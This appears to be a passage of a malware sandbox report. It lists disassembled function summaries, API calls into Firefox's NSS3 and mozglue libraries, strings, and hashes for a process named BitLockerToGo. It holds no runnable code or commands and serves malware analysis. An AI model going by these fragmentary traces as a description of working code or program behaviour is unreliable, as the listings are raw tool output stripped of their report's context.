                                                                                                                                                      • Opcode ID: 7a80de279b4005519dec73cebfe24f1837df0515a14086c0af95a1e6701ce627
                                                                                                                                                      • Instruction ID: 54d44234bf34edfd341a3962b37d7fd140b33c8ff5335cb449d70aed5bb66da7
                                                                                                                                                      • Opcode Fuzzy Hash: 7a80de279b4005519dec73cebfe24f1837df0515a14086c0af95a1e6701ce627
                                                                                                                                                      • Instruction Fuzzy Hash: 91B170B0E022199FEF00CBA5DC44B9EBBB9AF05348F540124E815E7B40E735E979CBA1
                                                                                                                                                      APIs
                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6C954C4C
                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6C954C60
                                                                                                                                                      • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6C954CA1
                                                                                                                                                      • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 6C954CBE
                                                                                                                                                      • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6C954CD2
                                                                                                                                                      • realloc.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C954D3A
                                                                                                                                                      • PORT_Alloc_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C954D4F
                                                                                                                                                      • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6C954DB7
                                                                                                                                                        • Part of subcall function 6C9BDD70: TlsGetValue.KERNEL32 ref: 6C9BDD8C
                                                                                                                                                        • Part of subcall function 6C9BDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C9BDDB4
                                                                                                                                                        • Part of subcall function 6C9007A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C89204A), ref: 6C9007AD
                                                                                                                                                        • Part of subcall function 6C9007A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C89204A), ref: 6C9007CD
                                                                                                                                                        • Part of subcall function 6C9007A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C89204A), ref: 6C9007D6
                                                                                                                                                        • Part of subcall function 6C9007A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C89204A), ref: 6C9007E4
                                                                                                                                                        • Part of subcall function 6C9007A0: TlsSetValue.KERNEL32(00000000,?,6C89204A), ref: 6C900864
                                                                                                                                                        • Part of subcall function 6C9007A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C900880
                                                                                                                                                        • Part of subcall function 6C9007A0: TlsSetValue.KERNEL32(00000000,?,?,6C89204A), ref: 6C9008CB
                                                                                                                                                        • Part of subcall function 6C9007A0: TlsGetValue.KERNEL32(?,?,6C89204A), ref: 6C9008D7
                                                                                                                                                        • Part of subcall function 6C9007A0: TlsGetValue.KERNEL32(?,?,6C89204A), ref: 6C9008FB
                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6C954DD7
                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6C954DEC
                                                                                                                                                      • PR_Unlock.NSS3(?), ref: 6C954E1B
                                                                                                                                                      • PR_SetError.NSS3(00000000,00000000), ref: 6C954E2F
                                                                                                                                                      • PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C954E5A
                                                                                                                                                      • PR_SetError.NSS3(00000000,00000000), ref: 6C954E71
                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C954E7A
                                                                                                                                                      • PR_Unlock.NSS3(?), ref: 6C954EA2
                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6C954EC1
                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6C954ED6
                                                                                                                                                      • PR_Unlock.NSS3(?), ref: 6C954F01
                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C954F2A
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084496641.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084477777.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084634850.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084670849.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084686880.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084702944.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084718355.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c890000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Value$CriticalSectionUnlock$Enter$Error$callocfree$Alloc_LeaveUtilrealloc
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 759471828-0
                                                                                                                                                      • Opcode ID: 127bff47b6411aa21f313674cc18e68b6857bd8ce125c1586ce99823c37b7cab
                                                                                                                                                      • Instruction ID: bd971dbf662ea62ddd7b1819fec3713fa6feaa24e2efe5226666a21a08cb00c6
                                                                                                                                                      • Opcode Fuzzy Hash: 127bff47b6411aa21f313674cc18e68b6857bd8ce125c1586ce99823c37b7cab
                                                                                                                                                      • Instruction Fuzzy Hash: 19B11275A002069FDF45EF28D844AAA77B8BF59318F848128ED0597B00E734E976CFE1
                                                                                                                                                      APIs
                                                                                                                                                      • PR_GetEnvSecure.NSS3(SSLKEYLOGFILE,?,6C9A6BF7), ref: 6C9A6EB6
                                                                                                                                                        • Part of subcall function 6C901240: TlsGetValue.KERNEL32(00000040,?,6C90116C,NSPR_LOG_MODULES), ref: 6C901267
                                                                                                                                                        • Part of subcall function 6C901240: EnterCriticalSection.KERNEL32(?,?,?,6C90116C,NSPR_LOG_MODULES), ref: 6C90127C
                                                                                                                                                        • Part of subcall function 6C901240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6C90116C,NSPR_LOG_MODULES), ref: 6C901291
                                                                                                                                                        • Part of subcall function 6C901240: PR_Unlock.NSS3(?,?,?,?,6C90116C,NSPR_LOG_MODULES), ref: 6C9012A0
                                                                                                                                                      • fopen.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,6CA4FC0A,6C9A6BF7), ref: 6C9A6ECD
                                                                                                                                                      • ftell.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C9A6EE0
                                                                                                                                                      • fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(# SSL/TLS secrets log file, generated by NSS,0000002D,00000001), ref: 6C9A6EFC
                                                                                                                                                      • PR_NewLock.NSS3 ref: 6C9A6F04
                                                                                                                                                      • fclose.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C9A6F18
                                                                                                                                                      • PR_GetEnvSecure.NSS3(SSLFORCELOCKS,6C9A6BF7), ref: 6C9A6F30
                                                                                                                                                      • PR_GetEnvSecure.NSS3(NSS_SSL_ENABLE_RENEGOTIATION,?,6C9A6BF7), ref: 6C9A6F54
                                                                                                                                                      • PR_GetEnvSecure.NSS3(NSS_SSL_REQUIRE_SAFE_NEGOTIATION,?,?,6C9A6BF7), ref: 6C9A6FE0
                                                                                                                                                      • PR_GetEnvSecure.NSS3(NSS_SSL_CBC_RANDOM_IV,?,?,?,6C9A6BF7), ref: 6C9A6FFD
                                                                                                                                                      Strings
                                                                                                                                                      • NSS_SSL_ENABLE_RENEGOTIATION, xrefs: 6C9A6F4F
                                                                                                                                                      • NSS_SSL_CBC_RANDOM_IV, xrefs: 6C9A6FF8
                                                                                                                                                      • # SSL/TLS secrets log file, generated by NSS, xrefs: 6C9A6EF7
                                                                                                                                                      • SSLKEYLOGFILE, xrefs: 6C9A6EB1
                                                                                                                                                      • NSS_SSL_REQUIRE_SAFE_NEGOTIATION, xrefs: 6C9A6FDB
                                                                                                                                                      • SSLFORCELOCKS, xrefs: 6C9A6F2B
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084496641.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084477777.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084634850.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084670849.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084686880.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084702944.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084718355.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c890000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Secure$CriticalEnterLockSectionUnlockValuefclosefopenftellfwritegetenv
                                                                                                                                                      • String ID: # SSL/TLS secrets log file, generated by NSS$NSS_SSL_CBC_RANDOM_IV$NSS_SSL_ENABLE_RENEGOTIATION$NSS_SSL_REQUIRE_SAFE_NEGOTIATION$SSLFORCELOCKS$SSLKEYLOGFILE
                                                                                                                                                      • API String ID: 412497378-2352201381
                                                                                                                                                      • Opcode ID: 12dffe60c5696a8657db78736ee2dbe29278f308295f9fb039eb1c27a32fee42
                                                                                                                                                      • Instruction ID: d8f3990b7f81615f50a8dc53c1a241ff9f1cd9c0312a6a3bb536c6340bdb9417
                                                                                                                                                      • Opcode Fuzzy Hash: 12dffe60c5696a8657db78736ee2dbe29278f308295f9fb039eb1c27a32fee42
                                                                                                                                                      • Instruction Fuzzy Hash: 31A169B2A55AA18BEB4446BCCD0235432A5BB9332AF59C364E830C7ECDDB76D443C351
                                                                                                                                                      APIs
                                                                                                                                                      • memchr.VCRUNTIME140(abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_,00000000,00000041,6C968E01,00000000,6C969060,6CA70B64), ref: 6C968E7B
                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,6C968E01,00000000,6C969060,6CA70B64), ref: 6C968E9E
                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(6CA70B64,00000001,?,?,?,?,6C968E01,00000000,6C969060,6CA70B64), ref: 6C968EAD
                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,?,6C968E01,00000000,6C969060,6CA70B64), ref: 6C968EC3
                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(5D8B5657,?,?,?,?,?,?,?,?,?,6C968E01,00000000,6C969060,6CA70B64), ref: 6C968ED8
                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,6C968E01,00000000,6C969060,6CA70B64), ref: 6C968EE5
                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,5D8B5657,00000001,?,?,?,?,?,?,?,?,?,?,?,?,6C968E01), ref: 6C968EFB
                                                                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6CA70B64,6CA70B64), ref: 6C968F11
                                                                                                                                                      • PORT_ArenaGrow_Util.NSS3(?,5D8B5657,643D8B08), ref: 6C968F3F
                                                                                                                                                        • Part of subcall function 6C96A110: PORT_ArenaGrow_Util.NSS3(8514C483,EB2074C0,184D8B3E,?,00000000,00000000,00000000,FFFFFFFF,?,6C96A421,00000000,00000000,6C969826), ref: 6C96A136
                                                                                                                                                      • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C96904A
                                                                                                                                                      Strings
                                                                                                                                                      • abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_, xrefs: 6C968E76
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084496641.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084477777.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084634850.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084670849.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084686880.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084702944.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084718355.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c890000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ArenaUtil$Alloc_Grow_memcpystrlen$Errormemchrstrcmp
                                                                                                                                                      • String ID: abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_
                                                                                                                                                      • API String ID: 977052965-1032500510
                                                                                                                                                      • Opcode ID: f829a2216db846c418930ccece47dbe308caab75cfefdac0d61091429bac275b
                                                                                                                                                      • Instruction ID: 8d9a4e3eb09405c1c9adab23fb164f6d3820a7e2cf1d69393783e24e90dec089
                                                                                                                                                      • Opcode Fuzzy Hash: f829a2216db846c418930ccece47dbe308caab75cfefdac0d61091429bac275b
                                                                                                                                                      • Instruction Fuzzy Hash: 2C61E2B5D0011A9BEB10CF66CD80AABB7B9FF85358F154028DC58A7B40E732E955CBE0
                                                                                                                                                      APIs
                                                                                                                                                      • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C918E5B
                                                                                                                                                      • PR_SetError.NSS3(FFFFE007,00000000), ref: 6C918E81
                                                                                                                                                      • PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C918EED
                                                                                                                                                      • SEC_QuickDERDecodeItem_Util.NSS3(?,?,6CA418D0,?), ref: 6C918F03
                                                                                                                                                      • PR_CallOnce.NSS3(6CA72AA4,6C9712D0), ref: 6C918F19
                                                                                                                                                      • PL_FreeArenaPool.NSS3(?), ref: 6C918F2B
                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6C918F53
                                                                                                                                                      • memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6C918F65
                                                                                                                                                      • PL_FinishArenaPool.NSS3(?), ref: 6C918FA1
                                                                                                                                                      • SECITEM_DupItem_Util.NSS3(?), ref: 6C918FFE
                                                                                                                                                      • PR_CallOnce.NSS3(6CA72AA4,6C9712D0), ref: 6C919012
                                                                                                                                                      • PL_FreeArenaPool.NSS3(?), ref: 6C919024
                                                                                                                                                      • PL_FinishArenaPool.NSS3(?), ref: 6C91902C
                                                                                                                                                      • PORT_DestroyCheapArena.NSS3(?), ref: 6C91903E
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084496641.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084477777.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084634850.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084670849.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084686880.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084702944.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084718355.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c890000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Arena$Pool$Util$CallErrorFinishFreeItem_Once$Alloc_CheapDecodeDestroyInitQuickmemset
                                                                                                                                                      • String ID: security
                                                                                                                                                      • API String ID: 3512696800-3315324353
                                                                                                                                                      • Opcode ID: 1ed48861ab33b452ab5ad8b56696c808a436ba817e3e9fd06ea15e28ba1e0d9a
                                                                                                                                                      • Instruction ID: 8a8780cbbcf8ca97f2280ba7eda052cb26b4ae23a587ef79b948deff424a8623
                                                                                                                                                      • Opcode Fuzzy Hash: 1ed48861ab33b452ab5ad8b56696c808a436ba817e3e9fd06ea15e28ba1e0d9a
                                                                                                                                                      • Instruction Fuzzy Hash: 945159B160C304AFD7145A189C42FAB33A8ABD534CF46082EF85897F40E731D918D7A7
                                                                                                                                                      APIs
                                                                                                                                                      • PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6C9DCC7B), ref: 6C9DCD7A
                                                                                                                                                        • Part of subcall function 6C9DCE60: PR_LoadLibraryWithFlags.NSS3(?,?,?,?,00000000,?,6C94C1A8,?), ref: 6C9DCE92
                                                                                                                                                      • PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6C9DCDA5
                                                                                                                                                      • PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6C9DCDB8
                                                                                                                                                      • PR_UnloadLibrary.NSS3(00000000), ref: 6C9DCDDB
                                                                                                                                                      • PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6C9DCD8E
                                                                                                                                                        • Part of subcall function 6C9005C0: PR_EnterMonitor.NSS3 ref: 6C9005D1
                                                                                                                                                        • Part of subcall function 6C9005C0: PR_ExitMonitor.NSS3 ref: 6C9005EA
                                                                                                                                                      • PR_LoadLibrary.NSS3(wship6.dll), ref: 6C9DCDE8
                                                                                                                                                      • PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6C9DCDFF
                                                                                                                                                      • PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6C9DCE16
                                                                                                                                                      • PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6C9DCE29
                                                                                                                                                      • PR_UnloadLibrary.NSS3(00000000), ref: 6C9DCE48
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084496641.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084477777.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084634850.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084670849.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084686880.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084702944.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084718355.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c890000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FindSymbol$Library$Load$MonitorUnload$EnterExitFlagsWith
                                                                                                                                                      • String ID: freeaddrinfo$getaddrinfo$getnameinfo$ws2_32.dll$wship6.dll
                                                                                                                                                      • API String ID: 601260978-871931242
                                                                                                                                                      • Opcode ID: 7c21d76ed13763538fd5e80174c19870ba2753b55cc4714549068267c2277551
                                                                                                                                                      • Instruction ID: 385eac42a0c7ac3664d96e677f0a28829282fd15336967e25e68956cad1ea23c
                                                                                                                                                      • Opcode Fuzzy Hash: 7c21d76ed13763538fd5e80174c19870ba2753b55cc4714549068267c2277551
                                                                                                                                                      • Instruction Fuzzy Hash: 6811BBE5F12A225AD7016D752C15EEE3A9C7B3214CF15C538E509E2E41FB20D54D86F1
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 6C7F31C0: LoadLibraryW.KERNEL32(KernelBase.dll), ref: 6C7F3217
                                                                                                                                                        • Part of subcall function 6C7F31C0: GetProcAddress.KERNEL32(00000000,QueryInterruptTime), ref: 6C7F3236
                                                                                                                                                        • Part of subcall function 6C7F31C0: FreeLibrary.KERNEL32 ref: 6C7F324B
                                                                                                                                                        • Part of subcall function 6C7F31C0: __Init_thread_footer.LIBCMT ref: 6C7F3260
                                                                                                                                                        • Part of subcall function 6C7F31C0: ?ProcessCreation@TimeStamp@mozilla@@SA?AV12@XZ.MOZGLUE(?), ref: 6C7F327F
                                                                                                                                                        • Part of subcall function 6C7F31C0: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C7F328E
                                                                                                                                                        • Part of subcall function 6C7F31C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C7F32AB
                                                                                                                                                        • Part of subcall function 6C7F31C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C7F32D1
                                                                                                                                                        • Part of subcall function 6C7F31C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6C7F32E5
                                                                                                                                                        • Part of subcall function 6C7F31C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6C7F32F7
                                                                                                                                                      • LoadLibraryW.KERNEL32(Api-ms-win-core-memory-l1-1-5.dll), ref: 6C809675
                                                                                                                                                      • __Init_thread_footer.LIBCMT ref: 6C809697
                                                                                                                                                      • LoadLibraryW.KERNEL32(ntdll.dll), ref: 6C8096E8
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 6C809707
                                                                                                                                                      • __Init_thread_footer.LIBCMT ref: 6C80971F
                                                                                                                                                      • SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C809773
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,MapViewOfFileNuma2), ref: 6C8097B7
                                                                                                                                                      • FreeLibrary.KERNEL32 ref: 6C8097D0
                                                                                                                                                      • FreeLibrary.KERNEL32 ref: 6C8097EB
                                                                                                                                                      • SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C809824
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084369153.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084351279.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084421648.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084443046.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084461949.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c7f0000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: LibraryTime$StampV01@@Value@mozilla@@$AddressFreeInit_thread_footerLoadProc$ErrorLastStamp@mozilla@@$Creation@Now@ProcessV12@V12@_
                                                                                                                                                      • String ID: Api-ms-win-core-memory-l1-1-5.dll$MapViewOfFileNuma2$NtMapViewOfSection$ntdll.dll
                                                                                                                                                      • API String ID: 3361784254-3880535382
                                                                                                                                                      • Opcode ID: 09e8706d1c302401373f28600765603798c6c05aad98d15e826f3afc3caae0c0
                                                                                                                                                      • Instruction ID: 1cebbb68aa9bbebb7aaafec93d2299b00351d9b92181dbe0f9d36a94b61447e9
                                                                                                                                                      • Opcode Fuzzy Hash: 09e8706d1c302401373f28600765603798c6c05aad98d15e826f3afc3caae0c0
                                                                                                                                                      • Instruction Fuzzy Hash: DD61D0717042559BDF318F69DE8CA9E3BB1EB8B358F104939E91583780E734A844CBE1
                                                                                                                                                      APIs
                                                                                                                                                      • SEC_ASN1DecodeItem_Util.NSS3(?,?,6CA41DE0,?), ref: 6C976CFE
                                                                                                                                                      • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C976D26
                                                                                                                                                      • PR_SetError.NSS3(FFFFE04F,00000000), ref: 6C976D70
                                                                                                                                                      • PORT_Alloc_Util.NSS3(00000480), ref: 6C976D82
                                                                                                                                                      • DER_GetInteger_Util.NSS3(?), ref: 6C976DA2
                                                                                                                                                      • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C976DD8
                                                                                                                                                      • PK11_KeyGen.NSS3(00000000,8000000B,?,00000000,00000000), ref: 6C976E60
                                                                                                                                                      • PK11_CreateContextBySymKey.NSS3(00000201,00000108,?,?), ref: 6C976F19
                                                                                                                                                      • PK11_DigestBegin.NSS3(00000000), ref: 6C976F2D
                                                                                                                                                      • PK11_DigestOp.NSS3(?,?,00000000), ref: 6C976F7B
                                                                                                                                                      • PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C977011
                                                                                                                                                      • PK11_FreeSymKey.NSS3(00000000), ref: 6C977033
                                                                                                                                                      • free.MOZGLUE(?), ref: 6C97703F
                                                                                                                                                      • PK11_DigestFinal.NSS3(?,?,?,00000400), ref: 6C977060
                                                                                                                                                      • SECITEM_CompareItem_Util.NSS3(?,?), ref: 6C977087
                                                                                                                                                      • PR_SetError.NSS3(FFFFE062,00000000), ref: 6C9770AF
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084496641.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084477777.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084634850.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084670849.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084686880.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084702944.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084718355.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c890000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: K11_$Util$DigestError$ContextItem_$AlgorithmAlloc_BeginCompareCreateDecodeDestroyFinalFreeInteger_Tag_free
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2108637330-0
                                                                                                                                                      • Opcode ID: ebe31b6f92eff2c49f29fa63d1532b73e2e796558eafd403f389d1cafc3833b4
                                                                                                                                                      • Instruction ID: a593ce7e2e195e143d2c4bc5fc399d28931c09eeba65c7aa1fe54fcc40f63838
                                                                                                                                                      • Opcode Fuzzy Hash: ebe31b6f92eff2c49f29fa63d1532b73e2e796558eafd403f389d1cafc3833b4
                                                                                                                                                      • Instruction Fuzzy Hash: 04A119715162009BEB209B24CC55B6B36A8EF9130CF24893DE919DBB81E735D869C7B3
                                                                                                                                                      APIs
                                                                                                                                                      • TlsGetValue.KERNEL32(?,?,?,6C91AB95,00000000,?,00000000,00000000,00000000), ref: 6C93AF25
                                                                                                                                                      • EnterCriticalSection.KERNEL32(?,?,?,?,6C91AB95,00000000,?,00000000,00000000,00000000), ref: 6C93AF39
                                                                                                                                                      • PR_Unlock.NSS3(?,?,?,6C91AB95,00000000,?,00000000,00000000,00000000), ref: 6C93AF51
                                                                                                                                                      • PR_SetError.NSS3(FFFFE041,00000000,?,?,?,6C91AB95,00000000,?,00000000,00000000,00000000), ref: 6C93AF69
                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6C93B06B
                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6C93B083
                                                                                                                                                      • PR_Unlock.NSS3(?), ref: 6C93B0A4
                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6C93B0C1
                                                                                                                                                      • EnterCriticalSection.KERNEL32(00000000), ref: 6C93B0D9
                                                                                                                                                      • PR_Unlock.NSS3 ref: 6C93B102
                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C93B151
                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C93B182
                                                                                                                                                        • Part of subcall function 6C96FAB0: free.MOZGLUE(?,-00000001,?,?,6C90F673,00000000,00000000), ref: 6C96FAC7
                                                                                                                                                      • PR_SetError.NSS3(FFFFE08A,00000000), ref: 6C93B177
